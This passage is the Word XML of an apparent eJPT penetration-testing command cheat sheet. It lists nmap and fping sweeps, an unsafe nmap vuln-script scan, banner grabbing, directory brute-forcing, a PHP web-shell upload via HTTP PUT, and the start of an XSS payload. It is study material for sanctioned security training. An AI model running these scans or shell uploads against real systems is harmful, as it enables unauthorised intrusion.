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EEE37" w14:textId="0DCFB9EE" w:rsidR="00C36402" w:rsidRDefault="00C36402" w:rsidP="00C36402">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C36402">
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>Command Guide</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve"> for </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>eJPT</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="751CAA50" w14:textId="77777777" w:rsidR="00C36402" w:rsidRPr="00C36402" w:rsidRDefault="00C36402" w:rsidP="00C36402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5"/>
        <w:gridCol w:w="2185"/>
      </w:tblGrid>
      <w:tr w:rsidR="00C36402" w14:paraId="0872AF94" w14:textId="77777777" w:rsidTr="0019187C">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7165" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2EF7B4FC" w14:textId="27687762" w:rsidR="00C36402" w:rsidRDefault="00C36402" w:rsidP="00C36402">
            <w:r>
              <w:t xml:space="preserve"># </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>ip</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> route</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2185" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6FE6E882" w14:textId="4F176967" w:rsidR="00C36402" w:rsidRDefault="00C36402" w:rsidP="00C36402">
            <w:r w:rsidRPr="00C36402">
              <w:t>prints the routing table for the host you are on</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C36402" w14:paraId="5750CACC" w14:textId="77777777" w:rsidTr="0019187C">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7165" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="32C6670E" w14:textId="1E2FCF6B" w:rsidR="00C36402" w:rsidRDefault="00C36402" w:rsidP="00C36402">
            <w:r>
              <w:t xml:space="preserve"># </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>ip</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> route add &lt;route to&gt; via &lt;route from&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2185" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="006C56F6" w14:textId="006FBAFC" w:rsidR="00C36402" w:rsidRDefault="00C36402" w:rsidP="00C36402">
            <w:r w:rsidRPr="00C36402">
              <w:t>add a route to a new network if on a switched network and you need to pivot</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C36402" w14:paraId="1800E716" w14:textId="77777777" w:rsidTr="0019187C">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7165" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5180CD20" w14:textId="522340F1" w:rsidR="00C36402" w:rsidRDefault="00C36402" w:rsidP="00C36402">
            <w:r>
              <w:t xml:space="preserve"># </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>whois</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> site.com</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2185" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="554A21D6" w14:textId="15A63AFE" w:rsidR="00C36402" w:rsidRDefault="00C36402" w:rsidP="00C36402">
            <w:r>
              <w:t xml:space="preserve">Enumeration of a site </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C36402" w14:paraId="70BEEA87" w14:textId="77777777" w:rsidTr="0019187C">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7165" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="75ADF062" w14:textId="52264DED" w:rsidR="00C36402" w:rsidRDefault="00C36402" w:rsidP="00C36402">
            <w:r>
              <w:t xml:space="preserve"># </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>fping</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> -a -g 10.10.10.0/24 2&gt;/dev/null</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2185" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2CEBE50D" w14:textId="3353338B" w:rsidR="00C36402" w:rsidRDefault="00C36402" w:rsidP="00C36402">
            <w:r>
              <w:t>Ping Sweep</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C36402" w14:paraId="37F91BE9" w14:textId="77777777" w:rsidTr="0019187C">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7165" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="67382FD5" w14:textId="316F3609" w:rsidR="00C36402" w:rsidRDefault="00C36402" w:rsidP="00C36402">
            <w:r>
              <w:t xml:space="preserve">#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sn</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> 10.10.10.0/24</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2185" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="718FE2B5" w14:textId="194CE15A" w:rsidR="00C36402" w:rsidRDefault="00C36402" w:rsidP="00C36402">
            <w:r>
              <w:t>Ping Sweep</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C36402" w14:paraId="1644F7DC" w14:textId="77777777" w:rsidTr="0019187C">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7165" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6AB091AF" w14:textId="79367F98" w:rsidR="00C36402" w:rsidRDefault="00C36402" w:rsidP="00C36402">
            <w:r>
              <w:t xml:space="preserve">#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Pn</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> -O 10.10.10.10</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2185" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="12D1D0D3" w14:textId="46ED9239" w:rsidR="00C36402" w:rsidRDefault="00C36402" w:rsidP="00C36402">
            <w:r>
              <w:t>OS detection</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C36402" w14:paraId="3FD5491F" w14:textId="77777777" w:rsidTr="0019187C">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7165" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6EE57827" w14:textId="236CFE10" w:rsidR="00C36402" w:rsidRDefault="00C36402" w:rsidP="00C36402">
            <w:r>
              <w:t xml:space="preserve">#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sC</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> -</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>sV</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> 10.10.10.10</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2185" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="743F6A13" w14:textId="747C66E3" w:rsidR="00C36402" w:rsidRDefault="00C36402" w:rsidP="00C36402">
            <w:r>
              <w:t>Nmap Quick Scan</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C36402" w14:paraId="76815480" w14:textId="77777777" w:rsidTr="0019187C">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7165" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="74630B97" w14:textId="218B679E" w:rsidR="00C36402" w:rsidRDefault="00C36402" w:rsidP="00C36402">
            <w:r>
              <w:t xml:space="preserve">#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sC</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> -</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>sV</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> -p- 10.10.10.10</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2185" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="16C09E30" w14:textId="34689DDE" w:rsidR="00C36402" w:rsidRDefault="00C36402" w:rsidP="00C36402">
            <w:r>
              <w:t>Nmap Full Scan</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C36402" w14:paraId="651C4FC1" w14:textId="77777777" w:rsidTr="0019187C">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7165" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7E5DF160" w14:textId="7883EBEE" w:rsidR="00C36402" w:rsidRDefault="00C36402" w:rsidP="00C36402">
            <w:r>
              <w:t xml:space="preserve">#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sU</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> -</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>sV</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> 10.10.10.10</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2185" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7501E788" w14:textId="2CAC8DD2" w:rsidR="00C36402" w:rsidRDefault="00C36402" w:rsidP="00C36402">
            <w:r>
              <w:t>Nmap UDP Quick</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C36402" w14:paraId="564142DD" w14:textId="77777777" w:rsidTr="0019187C">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7165" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="58F42D0D" w14:textId="665D3D27" w:rsidR="00C36402" w:rsidRDefault="00C36402" w:rsidP="00C36402">
            <w:r>
              <w:t xml:space="preserve">#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sn</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> 10.10.10.0/24 -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hosts.nmap</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2185" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2A7143C2" w14:textId="316D529F" w:rsidR="00C36402" w:rsidRDefault="00C36402" w:rsidP="00C36402">
            <w:r>
              <w:t xml:space="preserve">Nmap output file </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C36402" w14:paraId="059B793F" w14:textId="77777777" w:rsidTr="0019187C">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7165" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="30CD0CF7" w14:textId="3A8E26CE" w:rsidR="00C36402" w:rsidRDefault="00C36402" w:rsidP="00C36402">
            <w:r>
              <w:t xml:space="preserve"># cat </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>hosts.nmap</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t xml:space="preserve"> | grep for | cut -d “ “ -f 5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2185" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="45771CDF" w14:textId="6B3E258D" w:rsidR="00C36402" w:rsidRDefault="00C36402" w:rsidP="00C36402">
            <w:r>
              <w:t xml:space="preserve">To filter out just Ips from the </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>nmap</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> scan results</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C36402" w14:paraId="700CCC58" w14:textId="77777777" w:rsidTr="0019187C">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7165" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0F71D692" w14:textId="0E38AEF8" w:rsidR="00C36402" w:rsidRDefault="00C36402" w:rsidP="00C36402">
            <w:r>
              <w:t xml:space="preserve"># </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00C36402">
              <w:t>nmap</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00C36402">
              <w:t xml:space="preserve"> -</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00C36402">
              <w:t>sV</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00C36402">
              <w:t xml:space="preserve"> -</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00C36402">
              <w:t>Pn</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00C36402">
              <w:t xml:space="preserve"> -T4 -A -p- -</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00C36402">
              <w:t>iL</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00C36402">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00C36402">
              <w:t>hosts.nmap</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00C36402">
              <w:t xml:space="preserve"> -oN ports.nmap</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2185" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1D416001" w14:textId="2D68B194" w:rsidR="00C36402" w:rsidRDefault="00C36402" w:rsidP="00C36402">
            <w:r>
              <w:t xml:space="preserve">Other useful </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>nmap</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> scans</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C36402" w14:paraId="134BB102" w14:textId="77777777" w:rsidTr="0019187C">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7165" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="075ADFF6" w14:textId="12AC98C9" w:rsidR="00C36402" w:rsidRDefault="00C36402" w:rsidP="00C36402">
            <w:r>
              <w:t xml:space="preserve"># </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00C36402">
              <w:t>nmap</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00C36402">
              <w:t xml:space="preserve"> --script vuln --script-</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00C36402">
              <w:t>args</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00C36402">
              <w:t xml:space="preserve">=unsafe=1 -iL </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00C36402">
              <w:t>hosts.nmap</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2185" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="444E84DB" w14:textId="30F6CEF5" w:rsidR="00C36402" w:rsidRDefault="00C36402" w:rsidP="00C36402">
            <w:r>
              <w:t>Other useful nmap scans</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C36402" w14:paraId="76A3B964" w14:textId="77777777" w:rsidTr="0019187C">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7165" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="39CE1D80" w14:textId="77777777" w:rsidR="00C36402" w:rsidRDefault="00C36402" w:rsidP="00C36402">
            <w:r>
              <w:t xml:space="preserve"># </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>nc</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> -v 10.10.10.10 port </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7B4EA83D" w14:textId="67B6C2D3" w:rsidR="00C36402" w:rsidRDefault="00C36402" w:rsidP="00C36402">
            <w:r>
              <w:t>Head / HTTP/1.0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2185" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="13992EC3" w14:textId="4AC1F1FF" w:rsidR="00C36402" w:rsidRDefault="00C36402" w:rsidP="00C36402">
            <w:r>
              <w:t>Banner Grabbing</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C36402" w14:paraId="10D626A7" w14:textId="77777777" w:rsidTr="0019187C">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7165" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="73E7AD0A" w14:textId="77777777" w:rsidR="00C36402" w:rsidRDefault="00C36402" w:rsidP="00C36402">
            <w:r>
              <w:t xml:space="preserve"># </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>openssl</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>s_client</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> -connect 10.10.10.10:443</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0A203D6F" w14:textId="44AEAB52" w:rsidR="00C36402" w:rsidRDefault="00C36402" w:rsidP="00C36402">
            <w:r>
              <w:t>Head / HTTP/1.0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2185" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="11E171C4" w14:textId="40326721" w:rsidR="00C36402" w:rsidRDefault="00C36402" w:rsidP="00C36402">
            <w:r>
              <w:t>OpenSSL for HTTPS services</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C36402" w14:paraId="39B7D7B0" w14:textId="77777777" w:rsidTr="0019187C">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7165" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6A3EECDB" w14:textId="1C598B6C" w:rsidR="00C36402" w:rsidRDefault="00C36402" w:rsidP="00C36402">
            <w:r>
              <w:t xml:space="preserve"># </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>httprint</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> -P0 -h 10.10.10.10 -s /path/to/signaturefile.txt</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2185" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0B118213" w14:textId="42A00B7F" w:rsidR="00C36402" w:rsidRDefault="00C36402" w:rsidP="00C36402">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>Httprint</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C36402" w14:paraId="3DE44BDC" w14:textId="77777777" w:rsidTr="0019187C">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7165" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="40E06B9A" w14:textId="68024883" w:rsidR="00C36402" w:rsidRDefault="00C36402" w:rsidP="00C36402">
            <w:r>
              <w:t>GET, POST, HEAD, PUT, DELETE, OPTIONS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2185" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7C8CBAB9" w14:textId="717827F1" w:rsidR="00C36402" w:rsidRDefault="00C36402" w:rsidP="00C36402">
            <w:r>
              <w:t>HTTP Verbs</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C36402" w14:paraId="747B4A2B" w14:textId="77777777" w:rsidTr="0019187C">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7165" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5B84C146" w14:textId="77777777" w:rsidR="00C36402" w:rsidRDefault="00C36402" w:rsidP="00C36402">
            <w:r>
              <w:t xml:space="preserve"># </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>wc</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> -m </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>shell.php</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
          <w:p w14:paraId="484A87E7" w14:textId="77777777" w:rsidR="00C36402" w:rsidRDefault="00C36402" w:rsidP="00C36402">
            <w:r>
              <w:t xml:space="preserve">x </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>shell.php</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
          <w:p w14:paraId="087D7B70" w14:textId="77777777" w:rsidR="00C36402" w:rsidRDefault="00C36402" w:rsidP="00C36402"/>
          <w:p w14:paraId="6DEFB3B1" w14:textId="77777777" w:rsidR="00C36402" w:rsidRDefault="00C36402" w:rsidP="00C36402">
            <w:r>
              <w:t>PUT /</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>shell.php</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
          <w:p w14:paraId="4C3B4545" w14:textId="77777777" w:rsidR="00C36402" w:rsidRDefault="00C36402" w:rsidP="00C36402">
            <w:r>
              <w:t>Content-type: text/html</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3DF74549" w14:textId="77777777" w:rsidR="00C36402" w:rsidRDefault="00C36402" w:rsidP="00C36402">
            <w:r>
              <w:t>Content-length: x</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7C2807C1" w14:textId="45691EED" w:rsidR="00C36402" w:rsidRDefault="00C36402" w:rsidP="00C36402">
            <w:r>
              <w:t>Directory and File Scanning</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2185" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="26BE7AD7" w14:textId="697CD25C" w:rsidR="00C36402" w:rsidRDefault="00C36402" w:rsidP="00C36402">
            <w:r w:rsidRPr="00C36402">
              <w:t>You can use HTTP verbs to upload a php shell. Find the content length, then use PUT to upload the shell. Make sure you include the size of the payload when using the PUT command.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C36402" w14:paraId="4313D9B2" w14:textId="77777777" w:rsidTr="0019187C">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7165" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2DDA8759" w14:textId="77777777" w:rsidR="00C36402" w:rsidRDefault="00C36402" w:rsidP="00C36402">
            <w:r>
              <w:t xml:space="preserve"># </w:t>
            </w:r>
            <w:r w:rsidRPr="00C36402">
              <w:t>dirsearch.py -u http://10.10.10.10 -e *</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="52BB5FBD" w14:textId="12940D7F" w:rsidR="00C36402" w:rsidRDefault="00C36402" w:rsidP="00C36402">
            <w:r>
              <w:t>#</w:t>
            </w:r>
            <w:r w:rsidRPr="00C36402">
              <w:t>gobuster -u 10.10.10.10 -w /path/to/wordlist.txt</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2185" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7954BE42" w14:textId="2753A951" w:rsidR="00C36402" w:rsidRDefault="00C36402" w:rsidP="00C36402">
            <w:r>
              <w:t>Directory scanning tools</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C36402" w14:paraId="1B55B57A" w14:textId="77777777" w:rsidTr="0019187C">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7165" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="26064EB5" w14:textId="77777777" w:rsidR="00C36402" w:rsidRDefault="00C36402" w:rsidP="00C36402">
            <w:r>
              <w:t>site:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5B064926" w14:textId="77777777" w:rsidR="00C36402" w:rsidRDefault="00C36402" w:rsidP="00C36402">
            <w:r>
              <w:t>intitle:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1B311704" w14:textId="77777777" w:rsidR="00C36402" w:rsidRDefault="00C36402" w:rsidP="00C36402">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t>inurl</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="454CB09F" w14:textId="77777777" w:rsidR="00C36402" w:rsidRDefault="00C36402" w:rsidP="00C36402">
            <w:r>
              <w:t>filetype:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="79203BED" w14:textId="2A209822" w:rsidR="00C36402" w:rsidRDefault="00C36402" w:rsidP="00C36402">
            <w:r>
              <w:t xml:space="preserve">AND, OR, </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>&amp;,</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t xml:space="preserve"> |, -</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2185" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6170EE7E" w14:textId="77777777" w:rsidR="00C36402" w:rsidRPr="00C36402" w:rsidRDefault="00C36402" w:rsidP="00C36402">
            <w:r w:rsidRPr="00C36402">
              <w:lastRenderedPageBreak/>
              <w:t xml:space="preserve">Advanced Google Searches Not </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00C36402">
              <w:t xml:space="preserve">really </w:t>
            </w:r>
            <w:r w:rsidRPr="00C36402">
              <w:lastRenderedPageBreak/>
              <w:t>necessary</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00C36402">
              <w:t>, but useful to know all the same.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="64A7FB04" w14:textId="77777777" w:rsidR="00C36402" w:rsidRDefault="00C36402" w:rsidP="00C36402"/>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C36402" w14:paraId="26293569" w14:textId="77777777" w:rsidTr="0019187C">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7165" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1C09F130" w14:textId="77777777" w:rsidR="00C36402" w:rsidRDefault="00C36402" w:rsidP="00C36402">
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t>General steps for XSS</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4C17B0E9" w14:textId="77777777" w:rsidR="0019187C" w:rsidRDefault="0019187C" w:rsidP="00C36402"/>
          <w:p w14:paraId="1A3FA452" w14:textId="77777777" w:rsidR="0019187C" w:rsidRDefault="0019187C" w:rsidP="00C36402">
            <w:r>
              <w:t xml:space="preserve"># </w:t>
            </w:r>
            <w:r w:rsidRPr="0019187C">
              <w:t>&lt;script&gt;alert(</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="0019187C">
              <w:t>1)&lt;</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="0019187C">
